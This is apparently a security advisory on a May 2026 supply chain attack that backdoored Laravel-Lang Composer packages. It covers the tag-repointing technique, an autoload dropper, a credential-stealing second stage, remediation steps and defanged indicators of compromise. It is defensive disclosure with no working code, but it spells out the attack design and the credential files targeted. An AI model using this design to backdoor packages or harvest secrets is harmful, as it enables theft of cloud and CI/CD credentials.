Laravel-Lang Supply Chain Attack: 233 Package Versions Backdoored to Steal Cloud and CI/CD Secrets

An active supply chain attack against the community-maintained Laravel-Lang project has backdoored 233 historical versions across four widely used Composer packages, injecting a credential stealer that executes on every PHP request and exfiltrates cloud keys, Kubernetes tokens, CI/CD secrets, SSH keys, and browser data. Aikido Security detected the campaign on May 22, 2026; Socket published corroborating analysis early on May 23.

What Happened

The compromised packages are laravel-lang/lang (7.8k GitHub stars), laravel-lang/attributes, laravel-lang/http-statuses, and laravel-lang/actions. These are not part of the official Laravel framework — they are third-party localization packages pulled in by a large number of Laravel applications.

The attack technique is what makes this dangerous and hard to spot: the malicious code was never committed to the official repositories. GitHub allows a version tag to point at a commit from a fork of the same repository. The attacker created a malicious fork, then repointed git tags — across the 12.x, 13.x, 14.x, and 15.x release lines — to commits in that fork. Tags were republished in rapid succession on May 22 and 23, many seconds apart, a pattern consistent with automated mass re-tagging and with the attacker holding organization-level access or release automation.

Because Packagist resolves versions from git tags, anyone running composer install or composer update against an affected constraint pulled a poisoned version. Packagist removed the malicious versions and temporarily unlisted the packages after Aikido and Socket reported the campaign.

Technical Details

Stage 1 — the dropper. Each poisoned version added src/helpers.php and registered it in composer.json under autoload.files. Composer loads autoload.files entries automatically, so the backdoor runs on every PHP request handled by the application. The dropper fingerprints the host (an MD5 of file path, hostname, and inode), writes a marker file to the system temp directory so it fires only once, and rebuilds its C2 hostname at runtime from an integer array to defeat static scanners. It resolves to flipboxstudio[.]info. The dropper fetches a second stage from flipboxstudio[.]info/payload with TLS verification disabled and a spoofed Mozilla user agent, stages it under <tmp>/.laravel_locale/, then executes it in the background via exec() on Linux/macOS or a dropped .vbs launcher run through cscript on Windows.

Stage 2 — the stealer. The payload is a roughly 5,900-line cross-platform PHP infostealer built from 15-plus collector modules. It harvests AWS, GCP, Azure, DigitalOcean, Heroku, Vercel, Netlify, Railway, and Fly.io credentials — including live EC2 instance metadata from 169.254.169.254; kubeconfig files, Kubernetes service-account tokens, HashiCorp Vault tokens, Helm configs, and Docker config.json; SSH private keys, .git-credentials, .npmrc/.pypirc/.composer/auth.json, and shell history; CI/CD secrets from Jenkins (master.key, credentials.xml), GitLab runners, GitHub Actions, CircleCI, and ArgoCD; saved logins from 17 Chromium browsers (dropping a bundled DebugChromium.exe to defeat Chrome’s App-Bound Encryption) plus Firefox, KeePass, 1Password, and Bitwarden vaults; cryptocurrency wallets; and VPN configs. Results are encrypted with a hardcoded key and sent to flipboxstudio[.]info/exfil, after which the payload deletes itself.

Impact

Any host that ran a poisoned version should be treated as compromised, not merely exposed. That includes production servers, containers, CI runners, and developer workstations — anywhere the application executed. Because the backdoor fires on every request, even short-lived exposure is sufficient for full secret theft.

What To Do Now

Check composer.lock for laravel-lang/lang, laravel-lang/attributes, laravel-lang/http-statuses, and laravel-lang/actions, and block these packages until clean versions are confirmed. Rotate every secret reachable from affected hosts: cloud credentials, Kubernetes service-account and Vault tokens, CI/CD secrets, GitHub/GitLab tokens, SSH keys, Docker registry tokens, the Laravel APP_KEY, database credentials, and API keys. Rebuild affected hosts, containers, and CI runners from known-good images, and preserve composer.lock, Composer cache, DNS logs, and cloud/Kubernetes audit logs before cleanup. Pinning Composer dependencies to full commit SHAs rather than tags blocks this specific tag-repointing technique.

Indicators of Compromise

• C2 domain: flipboxstudio[.]info
• Payload fetch: flipboxstudio[.]info/payload — exfiltration: flipboxstudio[.]info/exfil
• Malicious file: src/helpers.php registered under autoload.files
• Staging path: <tmp>/.laravel_locale/
• Windows artifact: DebugChromium.exe
• Behavioral: background php/cscript execution, reads from /var/run/secrets/ and /proc/[pid]/environ, outbound requests to flipboxstudio[.]info

Sources

• Aikido Security: Supply Chain Attack Targets Laravel-Lang Packages
• Socket: Laravel Lang Compromised with RCE Backdoor Across 700+ Versions
• Cybersecurity News: Hackers Compromised 233 Versions of Laravel-Lang Packages